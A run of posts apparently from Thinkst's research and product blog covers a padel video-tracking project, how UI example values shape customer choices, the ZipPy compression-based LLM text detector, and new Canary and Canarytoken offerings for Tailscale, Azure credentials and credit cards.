• CourtVision – Where’s my padel at?

    Labs is the research arm of Thinkst but research has always been a key part of our company culture. All Thinksters are encouraged to work with Labs on longer term projects. These become that Thinkster’s “day job” for a while. (These are intended both for individual growth, and to stretch ourselves into new areas: They don’t have to be related to Canary or security).

    I took a brief hiatus from the engineering team to explore a computer vision project: CourtVision.

    CourtVision set out to explore how to process a video stream of a racquet and ball game (padel–popular in the southern hemisphere and growing in popularity world-wide!) from a stationary (but unaligned) camera and extract information about the game. Padel, like other racquet sports, is played on a regulation court with lines demarking in and out of bounds (though there are times when a ball is in play even outside of the court); CourtVision aimed to extract information such as player positions and ball trajectories from a video feed. Secondly, visualising these outputs to provide insights into game tactics and strategies.

    While there are existing computer vision systems to track play in racquet games, namely the Hawk-Eye system, these require systems of multiple fixed, calibrated, and synchronised cameras. The CourtVision challenge was to offer similar outputs from a single viewpoint, that is not in a specific location in relation to the court

    The problem formulation

    The problem is thought of as unwinding the events that gave rise to the video.  To achieve this we draw on prior knowledge such as court layout and ball and player dynamics. At each moment during a game the light emanating from the scene is sampled (at 30 fps) and produces a sequence of images.

    The problem now is to associate certain pixels in the image with objects in the scene we would like to know more about and then make estimates about the objects positions that best explain the sensor readings – image sequence. 

    Starting from here a number of avenues were explored and below is a linearized path of how we went about solving this problem.  

    The path is simple (looking back):

    1.  Establish a mapping from world coordinates to image plane pixel locations.
    2.  Detect objects of interest (players and ball) in each frame.
    3.  Estimate the world coordinates of each object by leveraging the inverse mapping found in Part 1.

    Establishing a mapping between world coordinates and image plane is a well understood problem and implementations exist in commonly used computer vision libraries. The unknown in our case is doing it given a single image. Taking inspiration from [3], where they used the net on a tennis court to form an additional plane, we took orthogonal planes from the court structure and jointly found the camera pose and intrinsic matrices. This is explained in Part 1of the blog below.

    In Part 2 we expand on how we leveraged existing computer vision models to detect objects of interest in each frame. 

    Previous works that attempted 3D tracking from a single camera relied on either: knowing the size of the object being tracked [1] and that its projected size is invariant to the viewing angle i.e spherical objects; or the object of interest followed purely ballistic trajectories [2]. Here, we modeled the ball trajectory as a ballistic trajectory but retained a multimodal distribution over the ball’s states in a particle filter allowing the tracker to quickly adapt to new trajectories (modes) without explicitly modeling the interaction with walls, floor and racket. Part 3 illustrates this approach.

    We made the following assumptions: 

    1. Camera is stationary (but does not need to be in a specific location)
    2. Court dimensions are known.

    Players’ feet remain on the ground. Part 3 illustrates limitations in our tracker and by making this assumption we could improve player tracking stability.

    Figure 1: The experimental setup showing a broadcast camera view (resized) and a schematic of a padel court dimensions in [mm].

    Part 1: Camera calibration and pose estimation

    Extracting real-world measurements from a camera requires knowing both the extrinsics (position and pose) and the intrinsics (such as focal length and distortion coefficients) of the camera. Once these are known we can map any point in the world coordinate frame to a pixel location in the image. We can also project rays into the world coordinate system from a desired pixel location.

    Figure 2: An annotated frame showing three of the eight planes used to perform single image calibration. The additional planes not visualised here are the side, front and back walls and a horizontal plane at the height of the glass.

    The trade off made for not having to collect data first hand is that little is known about the setup. In this case the camera intrinsics and extrinsics were unknown. The common approach to determine camera intrinsics is to capture a calibration sequence which is often a checkerboard pattern. Since we didn’t have such a luxury we exploited the structure in the scene and defined a set of planes for which the image plane and world coordinate correspondences could be identified. By doing this we effectively introduced a set of 8 planes (similar to a checkerboard) and performed camera calibrations from this. The mean reprojection error was approximately 9 pixels on 1080 x 1920 images. 

    Part 2: Bootstrapping custom object detectors

    There are a plethora of off-the-shelf models that can do object detection however, none have single class “padel ball” detectors. Fine-tuning such a model is fairly common and to achieve this a few annotated frames were needed. LabelStudio is a very versatile data labeling tool that makes it easy to “put a model in the loop”. By doing this we bootstrapped our ball detector by repeatedly annotating more images and each time using the latest model to automatically label the additional images that were manually verified and corrected.

    Figure 3: Cycle of labelling data, training a object detection model, manually labelling more data assisted by the latest model’s predictions and retaining.

    Part 3: Bringing image detections to the real world

    Making detections on an image plane tells us nothing about the player and balls position in the real world. To estimate the position of the ball and players we define a state for each player and the ball and then update this state based on the detections. To govern this process in a more principled manner we used a Bayesian filter and in particular a particle filter. 

    A particle filter stores a distribution over the state of each object. This is stored as a vector and an associated weight indicating a probability mass. To illustrate this the top image in figure 4 shows the cloud of particles representing the state of the ball. During the filter’s update step we follow Bayes rule to update the weight of each particle based on how well they explain the observation (the image). As we can see the core of the particle cloud is around the ray emanating from the detected ball position in the image. All particles along that ray “explain” the observation equally well. The information held in that current state (prior) ensures the updated state does not naively squash all particles onto the ray. Bayesian filters like this are a great way to encode knowledge we have about the ball dynamics and current state and update this belief as we get more observations.

    Figure 4: Top: showing the internal state of the ball tracker. Each particle representing an amount of “probability mass” over the position of the ball. Bottom: The yellow square is the ball detector’s output. The yellow dot is the weighted mean estimate of the ball position projected into the image plane.

    But we don’t want a fuzzy cloud around where the tracker “thinks” the ball is? We want to know the best estimate of the ball’s position. Once again we consult our probability distribution over our ball states. We can grab any statistic we want. The particle with the largest weight – argmax or the weighted mean over all states. Below is the weighted mean position of the ball. 

    Figure 5: Top: Shows the weighted mean ball position. Bottom: The reprojected mean estimate of the ball in the image plane.

    This approach shows promising results but we did see the tracker fail after a few missed detection and resulted in mode collapse. That is the distribution over ball state (cloud of particles as in figure 6) either dispersed or reduced to a point. Particle filters come in a number of flavors and we only implemented the simplest resampling methods so it might be a bug in this or just a naive choice somewhere. Ah, research, so many avenues to explore! 

    To constrain the player tracking to a plane we called on assumption 3. from above and projected the ray to intersect with the ground plane. These results are shown below as a heatmap of player positions and velocity. Tracking under this constraint means a detected player (measurement) can be projected onto the ground plane (tracker state) with no information loss (3D to 2D) and our tracker remains performant.


    Figure 6: Top: heatmaps of position (left) and velocity (right) of the players. The team on the left side of the court is in the foreground in the bottom image.

    The ultimate goal of such a system is to provide insights into game play and strategies. To this end we show court occupation and player movement speeds. The position and velocity heatmaps of players during a rally. The bottom image has Team A in the foreground and Team B in the background. Here we can see where players were during the rally as well as how they moved. In this rally we can see Team A  (on the left) plays from deep while Team B (on the right) occupies the mid court far more. Translating this raw positional information into actionable insights remains as future work. 

    Going from a set of hypotheses to evaluating them is a fun technical challenge and my time in Thinkst Labs was great. I still hope to bring this to a court sometime soon and test the final assumption: seeing game play metrics can improve tactics. 


    A collection of tools this project found useful as well as outputs from this work.


    [1] 3D Ball Localization From A Single Calibrated Image

    [2] MonoTrack: Shuttle trajectory reconstruction from monocular badminton video

    [3] Generic 3-D Modeling for Content Analysis of Court-Net Sports

  • Default behaviour sticks (And so do examples)


    We spend huge amounts of time sweating the details of our products. We want to remove all the friction we can from using them and want to make sure we never leave our users confused. To get this right, we do a bunch of things: we use simple language, we make extensive use of context-sensitive help and where it’s needed, we nudge users with illustrative examples.

    Recently we bumped into something that made us rethink our use of examples.


    Paid Canary customers also receive a private Canarytokens server as part of their subscription. This is a private, managed version of the service publicly available at www.canarytokens.org. They get to mint an unlimited number of Canarytokens, get access to some tokens before they are released to the world and are able to trivially customise the service.

    Canarytokens typically (but not always) rely on a DNS zone that’s unique per-customer. When a customer signs up, we create a DNS zone for them and usually that’s sufficient for their needs.

    However, one of the advanced customisations for customers is the ability to create their own DNS zone with a name they pick. They’d typically do this to make the underlying hostname obviously tied to their company, so their custom DNS zone might look like assets.their-company.com. This requires users to pick a zone name, and as a UX guide we autogenerated a name for them. We happily used someprefix.their-company.com21, as an example:

    When we built the UI for this feature, the inclusion of the someprefix example was to make it easier for customer to configure DNS on their end, given that DNS can be tricky to get right. It wasn’t the intention that customer only use a zone called someprefix, we simply picked it because we needed something to use in our examples. If the example zone name becomes an implicit standard then the risk is that it lets attackers more confidently guess about Canarytokens based on discovered hostnames.

    Recently, one of our engineers was working in this area of code and wondered how many customers simply followed the example shown and picked someprefix.their-company.com as their custom domain of choice, as opposed to choosing another. His intuition was spot on. Among customers using this feature, ~40% used the example we provided:

    We use the custom domain to make Canarytokens less identifiable. If 40% of them use the same custom name, then the disguise is not as effective.


    To be sure, this is not an individual customer problem. Looking at other configuration options present in our UI, the pattern is clear. When given an example, a significant number of users default to using that same example in their customisation. The behaviour is consistent across customers and configurations. This surprised us! 2

    It’s important to realise this isn’t a customer-side issue; they shouldn’t have to consider the impact of every configuration option we choose to put in front of them. They don’t have the full context and knowledge, and expecting them to be experts in the nitty gritty of Canarytoken discoverability makes no sense. Frankly it’s a reason enterprise software is often so terrible; tons of options you barely understand or know about, and are configured according to tutorials/examples rather than understanding. This is a lesson for us internally about how we guide customers through using Canarytokens, and more generally through Canary.

    Fortunately this particular case has a simple enough fix. Going forward, we will show multiple examples of prefixes. A user looking to add a custom domain will see a variety of example zones when they visit the page, and the examples will cycle each time they open the configuration page. We want to convey that they have options in choosing the name, and we show them a variety of sample options. Our hope is that this will prompt customers to pick their own names, and if they do rely on our examples then those are now spread over a large list of examples.


    The outsized impact what seemed like a very minor placeholder choice made years ago helped us reevaluate how we select the examples we show customers. It’s a strong reminder about sweating every small detail in the UI; we were surprised at the oversized effect of our examples.

    Going forward this particular placeholder has been altered and is already live for customers. We will report back with a count with the new active examples in the future.

    1. some-prefix is used in this post to protect our poorly chosen actual-prefix 🙄 ↩︎
    2. It’s likely this result is known in UI design circles, but was new to us. Please send references to other work!
  • Meet “ZipPy”, a fast AI LLM text detector


    Today we’re open-sourcing a research project from Labs, ZipPy, a very fast LLM text detection tool. Unless you’ve been living under a rock (without cellphone coverage), you’ve heard of how generative AI large language models (LLMs) are the “next big thing”. Hardly a day goes by without seeing a breathless article on how LLMs are either going to remake humanity, or bring upon its demise; this post is neither, while we think there are some neat applications for LLMs, we doubt it’s the end of work or humanity. LLMs do provide the ability to scale natural language tasks, for good or ill, it is when that force-multiplier is used for ill, or without attribution, that it becomes a concern already showing up, from disinformation campaigns, cheating in academic environments, or automating phishing; detecting LLM-generated text is an important tool in managing the downsides.

    There are a few LLM text classifiers available, the open-source Roberta-base-openai-detector model, GPTZero, and OpenAI’s detector. All of these have shortcomings: they are also large models trained on large datasets, and the latter two are commercial offerings with little information on how they operate or perform. ZipPy is a fully open-source detector that can be embedded into any number of places, enabling detection “on the edge”.

    TL:DR; ZipPy is a simple (< 200 LoC Python), open-source (MIT license), and fast (~50x faster than Roberta) LLM detection tool that can perform very well depending on the type of text. At its core, ZipPy uses LZMA compression ratios to measure the novelty/perplexity of input samples against a small (< 100KiB) corpus of AI-generated text—a corpus that can be easily tuned to a specific type of input classification (e.g., news stories, essays, poems, scientific writing, etc.).

    We should note that no detection system is 100% accurate, ZipPy included, and it should not be used to make high-consequence determinations without corroborating data.


    Generative AI and LLMs

    LLMs are statistical machine learning (ML) models with millions or billions of parameters, trained on many gigabytes or terabytes of training input. With the immense volume of input data, during the training phase the model aims to build a probability weighting for all tokens or words given the preceding context. For example, if you were to read the contents of the entire web, the sentence “The quick brown fox jumps over the lazy dog” would [relatively] frequently. Given the context “The quick brown”, the most probable next word is learned to be “fox”. LLMs have to be trained on large datasets in order to attain the “magical” level of text understanding, and this requirement leads to our detection strategy.

    Intuitively, every person has a unique vocabulary, style, and voice—we each learned to communicate from different people, read different books, had different educations. An LLM by comparison has the most probable/average style, being trained on close to the entire internet. This nuance is how LLM classifiers work—text written by a specific human will be more unique than the LLM’s model average human writer. The detectors listed above work by either explicitly or implicitly (through training on both human and LLM datasets) trying to determine how unique a text is. There are two common metrics, Perplexity and Burstiness.

    Perplexity is a measure of surprise encountered with reading a text. Imagine you had read the entire internet and knew the probability tables for each word given the preceding context. Given “The quick brown” as context, and the word “fox”, there would be a low perplexity as the chance of seeing “fox” come next is high. If the word was instead “slug”, that would have a large difference between expectations and reality, so the perplexity would increase. The challenge with calculating perplexity is that you have to have a model of all language in order to quantify the probability of the text. For this reason, the existing detectors use large models trained on either the same training data as is used to train the LLM generators, or datasets of both human and LLM generated texts.

    Burstiness is a calculation of sentence lengths and how they change throughout a text. Again, an LLM will generally migrate towards the mean, so lengths will be closer to the average, with human-written text having more variance in sentence length. This is easier to calculate, but more impacted by the type of text: some poems have little to no punctuation, whereas others have a number of highly uniform stanzas; news briefs are commonly punchier; and academic papers (and blogs about burstiness) can have extremely long sentences.

    Both of these metrics are impacted by the temperature parameter used by an LLM to determine how much randomness to include in generation. Higher temperatures will be more perplexity and bursty, but run the risk of being more non-sensical to a human reader. If a human author is writing a summary of a local slug race, captioning a picture: “The quick brown slug, Sluggy (left), took home the gold last Thursday” would make sense. LLMs don’t understand the world or what they are writing, so if the temperature were set high enough that it would output: “The quick brown slug”, the rest of the text would likely be nonsensical.


    Compression is the act of taking data and making it smaller, with a matched decompression function that returns the compressed data to [close to] the original input. Lossless compression (e.g., .ZIP files) ensures that the data post compression and decompression is the same as the original input; lossy compression (e.g., .JPG or .MP3 files) may make minor adjustments for better compression ratios. Compression ratios are a measure of how much smaller the compressed data is than the original input. For the remainder of this blog post we’ll just be discussing lossless compression.

    Compression generally works by finding commonly repeated sequences and building a lookup table or dictionary. A file consisting of all one character would compress very highly, whereas truly random data would compress more poorly. Each compression algorithm may have different scheme for choosing which sequences to add to the table, and how to efficiently store that table, but generally they work on the same principles.

    Compression was used in the past as a simple anomaly detection system: by feeding network event logs to a compression algorithm and measuring the resultant compression ratio, the novelty (or anomaly) of the input could be determined. If the input changes drastically, the compression ratio will decrease, alerting to anomalies, whereas more of the same background event traffic will compress well having already been included in the dictionary.


    ZipPy is a research tool that uses compression to estimate the perplexity of an input. With this estimation, it is possible to classify a text’s source in a very efficient manner. Similar to the network event anomaly model, ZipPy looks for anomalies in the input when compared to a [relatively] large initial input of AI-generated text. If the compression ratio improves when the sample is compressed, the perplexity is low as there are existing dictionary entries for much of the sample, whereas a high-perplexity input would reduce the ratio.

    ZipPy starts with a body of text, all generated by LLMs (GPT, ChatGPT, Bard, and Bing) and compresses it with the LZMA compression algorithm (the same as in .ZIP files), calculating the ratio = compressed_size / original_size. The input sample is then appended to the LLM-generated corpus and compressed again with the new ratio computed the same way. If the corpus compresses worse than with the sample, then the sample is likely to be LLM-generated; if the compression ratio decreases, then the sample is more perplexity, and is more likely human-generated.

    At its core, that’s it! However, as part of our research, there are a number of questions we’ve been exploring:

    • How does the compression algorithm change the performance?
      • What about compression presets (which improve compression but are slower)
    • What is the optimal size and makeup of the initial body of AI-generated text?
      • Should the samples be split into smaller pieces?
      • Is there a minimum length of sample that can impact the overall ratio enough to get good data?
    • How should formatting be handled? An early test on a human sample failed because each line was indented with 8 spaces (which compressed well).

    We don’t have all the answers yet, but our initial findings are promising!


    In order to test how well ZipPy performs, we needed datasets of both human and LLM text. In addition to using ChatGPT, Bard, and Bing to generate about ~100 new samples to test, we explored the following datasets:

    OpenAI’s GPT-3 dataset

    OpenAI’s GPT-2 dataset (webtext and xl-1542M)

    MASC 500k (excluding the email and twitter collections)

    GPT-2-generated academic abstracts

    News articles re-written by ChatGPT

    CHEAT (ChatGPT-generated academic abstracts)

    ZipPy performs best on datasets that are English (due to all of the AI-generated “training” text being English-language) and that are written as sensical prose. Two of the datasets we evaluated, GPT-2 and GPT-3 output were created without prompts to guide the output. ZipPy performs poorly on these, as the output is either poor (difficult to understand as a human) and/or extremely diverse (multiple languages, code, and odd formatting). A few examples from these datasets are provided below to provide a sense of the data that is difficult to classify for ZipPy:

    layout_container:Genotion 2 – HD select

    Focus: Batsu

    Most more much HD contains information about is one of the best addon…read more Posts: 7

    Check out more from Christina at: stock666.com Posted by:| September 03, 2018 06:36 AM design3D 2-3-3-3 … Posted by:| September 03, 2018 06:05 AM hiszog 2-3-3-3 … Posted by:| September 03, 2018 05:27 AM too amateur. At boot it says DLL missing. Posted by:| September 03, 2018 04:12 AM likes2eat 4-3-3-3 Early Review andenjoy! Posted by:| September 03, 2018 05:54 AM AutoVR 2-3-3-3 Built Dutch : O Posted by:| September 03, 2018 05:30 AM looks like it will get more popular : o Posted by:| September 03, 2018 02:10 AM Cross Fitness 3.0 Part 1 by CrossFit up

    OpenAI GPT-2 sample #1

    Convocainftvalerie 20

    13.9” L Y


    With Screen Case

    Material: Acetate

    Auction Location:

    10360 W. San Ramon Fairgrounds, Sonoma, California, 94950, United States


    Buyer’s Premiums: From (Incl.) To (Excl.) Premium 0.00 Infinite 20%

    Shipping Details:

    There if be 3 Methods to Buy from the Big T: (1) eTailer, Ebay or other Auction Sites, or (2) Ebay (convention). This Year Auction Will be Conducted on Ebay.com

    OpenAI GPT-2 sample #2

    1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399…1280

    OpenAI GPT-3 sample #1

    Někdy mi začne zazvonit v telefonu život, protože to vůbec není telefon, ale sekundární vlna, kterou jsem přivolala k sobě.

    Dnes mi to začalo zazvonit už po desáté, mám ráda pravidelnost, abych se v ní vyznala, a začala se pohybovat rychleji.

    Ne, nemůžete se najít v mém životě, ale nemusíte také.

    Protože se mi začne zazvonit, pořád stejně krásně, v okamžiku, když to přijde.

    A je to pro vás taky tak nějak to pravé.

    -Nekončí se už zase?- zaslechla jsem vyslovené základní já, a snažila jsem se mu na to odpovědět.

    Nemáte moc důvodů mě zastrašovat, nebo mi přerušovat. Vy jste větší zvíře. Můžete si mě zavolat, když vám bude zase chybět něco vážnějšího. Nechcete to zas vyhodit, jako každého docela rozumného a slušného kluka, nebo jak jejich říkáte.


    OpenAI GPT-3 sample #2

    With a subset of at most 500 samples per included dataset, we run just under 5000 documents through ZipPy (2m14s), OpenAI’s detector (29m22s), Roberta (1h36m17s), and GPTZero (1h1m39s). From this data, we construct a ROC curve for each. ROC curves show both the accuracy (area under the curve, or AUC) as well as the sensitivity at different decision thresholds. All the detectors provide a confidence score that a sample is either AI or human-generated, if the threshold for the decision boundary is adjusted, the detector may detect more true positives, but at the expense of more false positive detections.

    If the un-prompted datasets are excluded, the performance of the detectors gives the following ROC curve, with LZMA being the curve for ZipPy:

    ROC curve excluding un-prompted GPT-2 and GPT-3 output

    In simple terms, this curve shows that ZipPy correctly classifies the origin of an input 82% of the time, whereas Roberta has 80% accuracy, and both GPTZero and OpenAI sit at only 62% accurate. Adding the GPT-3 samples back in (without adding any new samples to the “training” file), the performance drops for ZipPy, and slightly improves for Roberta, which was trained on GPT datasets:

    ROC curve excluding only un-prompted GPT-2

    This shows that ZipPy’s compression-based approach can be accurate, but is much more sensitive to the type of input than Roberta. As ZipPy is more of an anomaly detector than a trained model, it cannot differentiate between novel types of input as well as the larger models. It does appear able to handle different types of data that have been added to the training file, the same data is used for news, essays, abstracts, forum posts, etc. but not completely differently formatted texts or those not in the same language as the training data. Additionally, due to the simple implementation, it is comparably easy to customize ZipPy for a specific set of inputs: simply replace the training file with LLM-generated inputs those that more closely the type of data to be detected.

    It is interesting to see how poor the performance is from both OpenAI’s and GPTZero’s detectors, they are the commercial, closed-source options. That OpenAI’s detector should perform so poorly on datasets that presumably they would have easy access to is curious, hopefully as they improve their models their performance will catch up with the open-source Roberta model.


    In conclusion, we think that ZipPy can add utility to workflows handling data of unknown origin. Due to its size, speed, and tunability, it can be embedded into a host of places where a 1.5B parameter model (Roberta) couldn’t. In the GitHub repository is: a Python 3 implementation of ZipPy, a Nim implementation that compiles to both a binary and a web-based detector, all of the data tested on, and harnesses for testing ZipPy and the other detectors.

    As a cute example of how this could be used, we also include a browser extension that uses ZipPy in a web worker to set the opacity of web text to the confidence it is human-written. While there is too much diversity to the style of text in an average day’s browsing session, it demonstrates a proof-of-concept for filtering out the LLM-generated noise.

    We are still actively exploring this idea, and would love feedback or thoughts. If you’d like to collaborate with us, or have something you’d like to share, please reach out to research@thinkst.com.

  • Birds at (Tail)scale

    This week we are super excited to release the latest addition to our lineup of Thinkst Canary platforms: Tailscale.


    We’ve always made sure that deploying Canaries is absurdly quick and painless. It’s why you can add a hardware Canary to your network just by plugging it in and why most customers end up re-thinking their detection roadmaps:


    We adore Tailscale: They have a first-rate team and their product is also widely loved for being startlingly simple to deploy. For this reason alone, we needed to consider a Tailscale Canary. But first, what is Tailscale?


    Tailscale is a mesh VPN to run your own secure network. Think: I want all my endpoints to talk to each other on a secure network wherever they are in the world without worrying about eavesdropping. (They happen to do this with  amazingly little configuration, across enough platforms to make your head spin). Like Canary, “it just works”.

    (Really) Why a Tailscale Canary?

    As Tailscale grows (and we think it will) you will see logical networks being setup and used regardless of the configuration (or location) of the physical networks beneath them. The Tailscale admin gets to create policies that allow a developer-machine access to staging, or to prod through simple Tailscale routing rules.

    What will attacker lateral movement look like in a world like that?

    An attacker who compromises user-A effectively becomes user-A, and views the world from their perspective. (As always) They are able to pivot to machines on user-A’s local network, but they also have access to hosts on user-A’s Tailnet. This is where Canaries shine. Attackers probing for other hosts on the Tailnet deserve to bump into Canaries as much as attackers exploring your cloud environments do. If only we can make deployment quick and painless.

    Ed: they totally can.

    Deploying a Canary into your Tailnet is (unsurprisingly) shockingly easy. 

    Head over to your Console and select the [+] icon to add a Canary. Then head over to the “Tailscale (beta)” block and select “Add Tailscale Canary”.

    Enter an ephemeral Tailscale auth key and hit Launch. That’s it!

    A Canary boots and is added to your Console (and your Tailnet). 

    You can configure the Canary just like any of its cousins (and you can use your Tailscale config to make sure the Canary never sends traffic to other hosts on your Tailnet for added security).

    In the background we spin up an AWS environment per customer, drop a Canary into it and the bird joins your Tailnet. The AWS environment consists of a VPC and a private subnet in which the Canary lives. The Tailscale auth key is a single use tagged key such that the Canary joins with predefined ACLs that you control.

    What this gives you is a Canary in your inner circle. Here we configured the Canary called DataStore with a Windows file share and RDP. Nmap-ing shows it as Windows machine with the corresponding service ports open. 

    Mounting the file share places a Canary right in the path of any attacker.

    No matter where you work from, a Canary will be nearby to alert you to any undesired activity. For a total of 3 clicks and 4 minutes you will know when it matters. For more details head over to our knowledge base article.

  • Canarytokens.org welcomes Azure Login Certificate Token


    The AWS API key Canarytoken is a perennial favourite on Canarytokens.org, and we’ve heard requests for a similar token for Azure.

    In this blog post, we introduce the Azure Login Certificate Token (aka the Azure Token) to Canarytokens.org1

    As with all tokens, you can sprinkle Azure tokens throughout your environment and receive high fidelity notifications whenever they’re used. Place one on your CTO’s laptop, or on every server in your fleet. When attackers breach that laptop, or servers, or machine, they’ll search for useful credentials and discover the Azure tokens. Such juicy credentials are too tempting to ignore, and when they try them, you’ll be alerted to the compromise.

    Why is the Azure Login Certificate Token useful?

    Azure is second largest provider of cloud infrastructure services in the world. Hundreds of thousands of organizations use Azure Cloud to run their infrastructure. Thanks to the growing Infrastructure as Code movement, many of them are bound to use programmatic command line access to manage their infrastructure.

    Attackers know this too.

    Searching for Azure credentials is almost standard post-exploitation behaviour and finding login certificates are an attacker’s dream. This token turns that around. One alert, when it matters.

    Are Azure tokens just useful to Azure customers? Of course not; Canarytokens are useful across your actual vendor lines. You don’t need to be an AWS customer to deploy actionable and useful AWS API Key Canarytokens, and nor do you need to be an Azure customer to find Azure tokens useful at detecting compromises in your network.

    Attackers who find them won’t decide not to use them because they really don’t think you are an Azure shop. They will lick their chops while testing access (and in doing so will tip their hands).

    Creating Azure Login Certificate Token

    It’s dead simple: head over to canarytokens.org, our public Canarytokens service:

    1. Select ‘Azure Login Certificate’ from the drop down list.
    1. Enter an email and a token reminder. We use the email address to notify you when the token is tripped. The reminder you choose will be attached to the alert. (Choose a unique reminder! Nothing sucks more than knowing a token is tripped, but being unsure where you left it). A good Reminder is something like “Azure Token deployed to c:\Users\Administrator\ on DC-LON-02”, which clearly highlights where you placed it.
    2. Click on “Create my Canarytoken”:
    1. Congratulations, your new Azure token is ready to be deployed! The output displayed can either be copied into a new file in the place you want to deploy the token, or you can download a file and move it into place. Don’t forget to delete an intermediate copies of the data.

    Testing the Azure token

    On Linux (with the az tool installed), the token can be triggered simply by running:

    $ az login --service-principal -u <app-id> -p <password-or-cert> --tenant <tenant>

    with the relevant parameters updated using the information from the token. As an example:

    Within 5 to 10 minutes you’ll get an alert notification indicating that the credentials have been used:

    Where to deploy the Azure Token

    Place the Azure token config file alongside the certificate in a juicy place for potential attackers to find.

    Most systems have a ~/.azure folder (much like the ~/.aws or ~/.ssh) and you can place the config file and certificate there.

    Behind the scenes

    The route followed is similar to what we do with AWS Key Canarytokens. In short, we pre-generate credentials programmatically into a pool of available credentials because each takes a few seconds to create. These are later allocated to a user when they request a new Azure Canarytoken. We then monitor the usage logs of the Azure accounts in which the credentials were created, and if credentials were used we send the alert. 

    Wrapping up

    The new Azure Canarytoken gives Azure customers (and everyone else) a simple new way to detect breaches, by deploying Azure credentials at no risk to themselves in places attackers would typically find them. 

    Azure tokens are currently live on Canarytokens.org, and (as always) are completely free.

    They take just minutes to create and deploy (even if you are a slow typist). Try them. They are totally worth the time.


    1Commercial customers have had this token for a little while now.

  • Swipe right on our new credit card tokens!

    Swipe right on our new credit card tokens!

    Detect breaches with Canary credit cards!


    Today we’re releasing a new Canarytoken type: actual credit cards! 

    1. Head over to canarytokens.org;
    2. We give you a valid credit card (number, expiration, and CVC);
    3. If anyone ever attempts to use that card you’ll be notified.

    We recommend placing one anywhere you store payment information. If you ever get an alert on it, you know that that data-store has been compromised.


    Canaries generally aim to look like something an attacker would want to interact with. It’s why our mantra has always been that Canaries should look valuable (instead of just vulnerable). Historically, these have been network services, or a juicy repository of sensitive information that usually would encourage an attacker to advertise their presence as they move through the network attempting to find firm footholds. Canarytokens expand on that to include files or data that reliably trigger alerts when accessed. 

    Our new credit card tokens fit this bill perfectly. We give you a perfectly valid credit card. You store it somewhere and if it’s ever used, we will let you know.

    Mix it in with your store of saved card data or on payment gateways. An attacker who plans to test the cards (as they normally do when obtaining them) or attackers who try to use them will immediately advertise their presence, and your response team can spring into action.

    Using the token

    Using this new token is easy, just head over to Canarytokens.org, and select Credit Card token from the dropdown.

    Then enter the email address or webhook URL where you want to be notified when an attempted transaction occurs (we never use this to spam you or sell you things, it’s only to notify you when this card is used):

    Hit “Create my Canarytoken”, and after a few seconds we will give you a set of unique, valid (real) credit card information, complete with generated name, card number, expiration date, and CVC:

    You can also download this information as a CSV to programmatically import into your storage location. 

    Some places we recommend putting these include:

    1. Databases where you store customer payment information
    2. Email inboxes (PSTs) to get an alert on email compromise
    3. If you’re concerned about an insider, put one or two in a Word document on an internal file share in a file called something like: “travel payment info.docx”

    Take a deep breath and relax, the hard work is all done!

    If someone does try to use the card, the transaction will fail, and you’ll get an alert like this in your email with the merchant name, the amount of the transaction, and the note you put in when you created the account:

    This is a high quality alert–someone is actively trying to monetize data that they should only have been able to get from wherever you put this token. Like all other well deployed Canarytokens, it also self identifies. You can drop one in each payment store or database and forget about it (at least until the card expires). When you get the alert, you will know immediately that it’s the credit card from the Lisbon DB that was used, and you know immediately where to start investigating.

    The chances of a false positive for this alert is close to nil and historically it’s been clear that the quicker you are able to react to the compromise, the more you are able to contain the splash damage of the event.

    Conspicuous deception

    Canaries and Canarytokens have caught red-teamers, fast-fingered insiders and full-blown attackers all over the world. We expected them to when we started Canary. What we didn’t quite expect, was the deterrence factor once attackers became aware of their presence. Last year, during an external red-team engagement, we placed attackers on a presentation laptop in our conference-room. The attackers, knowing our proclivities, were afraid to move beyond that system, paralyzed (almost into inaction) for days. This matches feedback we’ve received both privately and publicly for years:

    We’ve been noodling on this a little bit and we’re calling it conspicuous deception. Letting people know you are running Canaries or Canarytokens in order to alter their behavior.

    We think the credit card Canarytoken is a good example of this.

    If this token has the impact that we hope, savvy attackers, or the buyers of their stolen dumps, will have to start considering the risk of a test swipe destroying the entire set. As merchants and their payment processors leverage this new visibility, they can respond to a test swipe event much more quickly, and with better understanding of the potential splash damage of a breach. Typically credit card companies and banks identify breaches through analysing multiple reports of fraud looking for commonalities in their transactions (such as physical charge locations, websites where the card was used, or payment processors that were involved). This takes time for sufficient fraud reports to flow in before the breached location can be identified. This token allows for near instantaneous identification of a breach.

    For low-tier attackers that continue to breach and steal cards without changing their tactics, this token will reduce their ability to monetize and commit fraud. Savvy attackers may start looking for patterns in the bank identification numbers (BINs) that we issue, and proactively deleting or excluding them from their dumps. For this reason we are in discussions with a number of banks to onboard their BINs to the system too, further mixing in legitimate cards with tokens. 

    It’s a compelling argument: “Would you like attackers to first remove your bank’s cards from dumps they steal?” 

    The more BINs we can cover with tokens, the more deterrence the token provides – even to organizations that have not deployed these tokens to their environment. This is a benefit of conspicuous deception, the possibility of the dump being tripwired provides protection even if it isn’t actually seeded with tripwires.


